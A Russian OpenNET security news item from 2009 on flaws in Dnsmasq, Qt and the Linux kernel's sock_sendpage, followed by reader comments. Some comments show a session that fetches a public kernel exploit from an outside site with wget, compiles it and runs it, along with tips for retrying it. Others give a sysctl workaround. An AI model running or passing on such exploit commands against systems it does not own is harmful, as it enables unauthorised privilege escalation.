The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимости в Dnsmasq и Qt. Эксплоит для sock_sendpage-уязвимости Linux ядра

01.09.2009 18:18

В пакете Dnsmasq, объединяющем в себе кэширующий DNS прокси и DHCP сервер, обнаружено две уязвимости, позволяющие удаленному злоумышленнику добиться выполнения своего кода. Для проявления уязвимости Dnsmasq должен быть запущен с поддержкой TFTP-сервиса, которая по умолчанию не используется в сборке Dnsmasq из состава дистрибутивов OpenWRT и DD-WRT, на которых построено множество различных точек доступа и небольших маршрутизаторов. Уязвимости устранены в версии dnsmasq 2.50.

Компания Nokia объявила о выпуске набора патчей исправлением проблем безопасности в библиотеке Qt версии 4.3.0 и выше. Проблема связана с ошибкой в реализации класса QSslCertificate и приводит к некорректному парсингу SAN (Subject Alternate Names) полей в сертификатах X.509, когда в этих полях содержатся символы с нулевым кодом.

Кроме того, представлен универсальный эксплоит для обнаруженной в начале августа уязвимости во всех версиях Linux ядра из диапазона 2.4.0-2.4.37.4 и 2.6.0-2.6.30.4. Эксплоит проверен на дистрибутивах CentOS 5.3/4.8, RHEL 5.3/4.8, SUSE 11/10-SP2 и Ubuntu 8.10 в сборках для платформ i386 и x86_64. Опасность представляет то, что Red Hat, Ubuntu, Novell и CentOS выпустили обновления ядра с исправлением данной уязвимости с большим опозданием, только на прошлой неделе.

  1. Главная ссылка к новости (http://www.coresecurity.com/co...)
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/23245-security
Ключевые слова: security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (18) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, vitek (??), 21:36, 01/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    у меня из реп обновились кеды до версии 4.3.1
    но нигде ни слова об этом.
    может с этими дырками связано...
     
  • 1.2, alex (??), 22:59, 01/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ну нет слов. Linux - это конечно хорошо, но неужели господа девелоперы не могут ужесточить проверки в разработки ядра и все такое. Блин, просто нет слов. :-(
     
     
  • 2.3, User294 (ok), 23:22, 01/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Кутя как бы не только на линухе есть. Да и dnsmasq тоже. А ядро пропатченное уже приехало...
     
     
  • 3.5, Анонимусс (?), 01:21, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Нет, просто вопрос во времени жизни этой уязвимости. Во всяких нуль-дей она могла лежать несколько лет и машины можно было хачить просто на раз. Жесть. Хоть я и являюсь несколько лет пользователем, контрибъютером линукса и все-такое, но честно, вот в таких случаях хочется ругаться самыми некрасивыми словами. Это же действительно ж@па.
     
  • 3.9, Maxim Chirkov (ok), 11:00, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >Кутя как бы не только на линухе есть. Да и dnsmasq тоже.
    >А ядро пропатченное уже приехало...

    Паранойя подсказывает мне, что опасность приближается со стороны автоматических систем установки обновлений. В последнее время прослеживаются тенденции в попытке организации распространения злонамеренного кода именно через обновления пакетов или новые версии программ. Вскрывшиеся попытки взлома инфраструктур известных проектов подтверждают эти подозрения. Один подкупленный, невнимательный или озлобленный человек в среде разработчиков и миллионы пользователей могут ничего не подозревая установить обновление с закладкой. Open source сообщество у всех на виду, организовать внедрение злонамеренного кода в легитимный продукт вполне реально, радует только то, что и обнружить это внедрение значительно проще. Но и пугает ненулевая верятность того, что могут и не обраружить вовремя. А была ли ошибка в openssl пакете Debian случайной ? Вообще, разбирая  уязвимости, не так редко возникает впечатление, что некоторые из них созданы специально.

    Вот несколько ссылок для размышления:
    http://www.opennet.me/opennews/art.shtml?num=23208
    http://www.opennet.me/opennews/art.shtml?num=22833
    http://www.opennet.me/opennews/art.shtml?num=22511
    http://www.opennet.me/opennews/art.shtml?num=22496
    http://www.opennet.me/opennews/art.shtml?num=20818
    http://www.opennet.me/opennews/art.shtml?num=20129
    http://www.opennet.me/opennews/art.shtml?num=17510
    http://www.opennet.me/opennews/art.shtml?num=16523
    http://www.opennet.me/opennews/art.shtml?num=13138
    http://www.opennet.me/opennews/art.shtml?num=11747
    http://www.opennet.me/opennews/art.shtml?num=16952
    http://www.opennet.me/opennews/art.shtml?num=15846
    http://www.opennet.me/opennews/art.shtml?num=8298
    http://www.opennet.me/opennews/art.shtml?num=7890

     
     
  • 4.12, User294 (ok), 14:11, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    В общем то логично, ибо удобный канал для массового заражения Но дело в том что... большой текст свёрнут, показать
     
     
  • 5.14, Антон (??), 14:56, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А подписать пакеты правильным ключом? А вот к таковым

    Проще простого, собирают материал про какого-нибудь разработчика бывшего хиппи балующегося "травкой", приезжает дядька в погонах и говорит  "будем заводить дело или как ?" Все, ключ в кармане, если вскроется - гнусные хакеры взломали сервер.  А то и утюг поможет. Зачем взламывать когда есть человеческий фактор и социальная инженерия ?

     
     
  • 6.15, pavlinux (ok), 15:38, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Что б утюг ставить, надо знать с какой целью 1 Явная цель - известна жертва, ... большой текст свёрнут, показать
     
  • 6.17, User294 (ok), 00:47, 03/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Проще простого, собирают материал про какого-нибудь разработчика бывшего хиппи
    >балующегося "травкой",

    И чего? Остальные будут на это все смотреть? Да они вой на полинтернета поднимут. Оно кому-то надо?

    >Все, ключ в кармане, если вскроется - гнусные хакеры взломали сервер.

    Попробуйте угадать через сколько это вскроется и какой резонанс вызовет? :).Какой-то почти научно фантастический сценарий. В дебияноподобных к тому же паливный и неудобный, потому что есть сорцы из которых делается пакет и все диффы как на ладони. Втихаря подпихнуть что-то в такой схеме и длительно оставаться незамеченным довольно проблематично. Например кто-то зафетчит сорцы и просечет несоответствие сорца бинарям или же левак в сорце (если там тоже бэкдор есть). И?

     
  • 5.16, Maxim Chirkov (ok), 21:31, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    То-то в прошлом году Fedora и Red Hat ключи меняли - Если утащили SSH-ключ, то... большой текст свёрнут, показать
     
     
  • 6.18, User294 (ok), 13:56, 03/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще - в теории возможно возможно все На практике некоторые вещи труднореализ... большой текст свёрнут, показать
     

  • 1.4, pavlinux (ok), 23:24, 01/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    pavel@amd64:/> mkdir /tmp/EXPLOIT && cd /tmp/EXPLOIT
    pavel@amd64:/tmp/EXPLOIT>  wget -с http://www.risesecurity.org/exploits/linux-sendpage.c
    pavel@amd64:/tmp/EXPLOIT> gcc linux-sendpage.c -o linux-sendpage
    pavel@amd64:/tmp/EXPLOIT> ./linux-sendpage
    mmap: Permission denied

    :( Ниработат

     
     
  • 2.7, Руслан (?), 07:04, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    попробуй так:
    gcc -Wall -m64 -o linux-sendpage linux-sendpage.c
     
  • 2.8, Руслан (?), 07:12, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    rus@home:/tmp/EXPLOIT$ ./linux-sendpage
    sh-3.2$ mkdir /root/123
    mkdir: невозможно создать каталог '/root/123': Отказано в доступе
    sh-3.2$ id
    uid=1000(rus) gid=1000(rus) группы=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),110(netdev),116(powerdev),117(fuse),1000(rus)

    И что с этим делать могут?

     

  • 1.6, Аноним (-), 02:10, 02/09/2009 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А у меня на Debian Stable почему-то работает :( В Debian до сих пор не обновили ядро?
     
     
  • 2.10, vitek (??), 11:02, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >А у меня на Debian Stable почему-то работает :( В Debian до сих пор не обновили ядро?

    обсуждали ж уже - http://www.opennet.me/opennews/art.shtml?num=23014
    обираешь пульсаудио и sudo sysctl vm.mmap_min_addr=65536 (штоб не 0 было)

     
     
  • 3.11, Аноним (-), 13:04, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    Этот универсальный эксплоит теперь умеет ломиться не только через пульсаудио, но и через bluetooth инфраструктуру :) Но смысл не в этом, латать багу в ядре будут или нет?
    sudo sysctl vm.mmap_min_addr=65536
    Это воркэраунд всетаки...
     
     
  • 4.13, vitek (??), 14:17, 02/09/2009 [^] [^^] [^^^] [ответить]  
  • +/
    >Этот универсальный эксплоит теперь умеет ломиться не только через пульсаудио, но и через bluetooth инфраструктуру :) Но смысл не в этом, латать багу в ядре будут или нет?

    вот даже и не знаю! :-D
    у меня сей универсальный продукт выдаёт:
    mmap: Permission denied
    ведро от 16 августа. что обсуждаем сейчас, в сентябре - не понятно.

     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру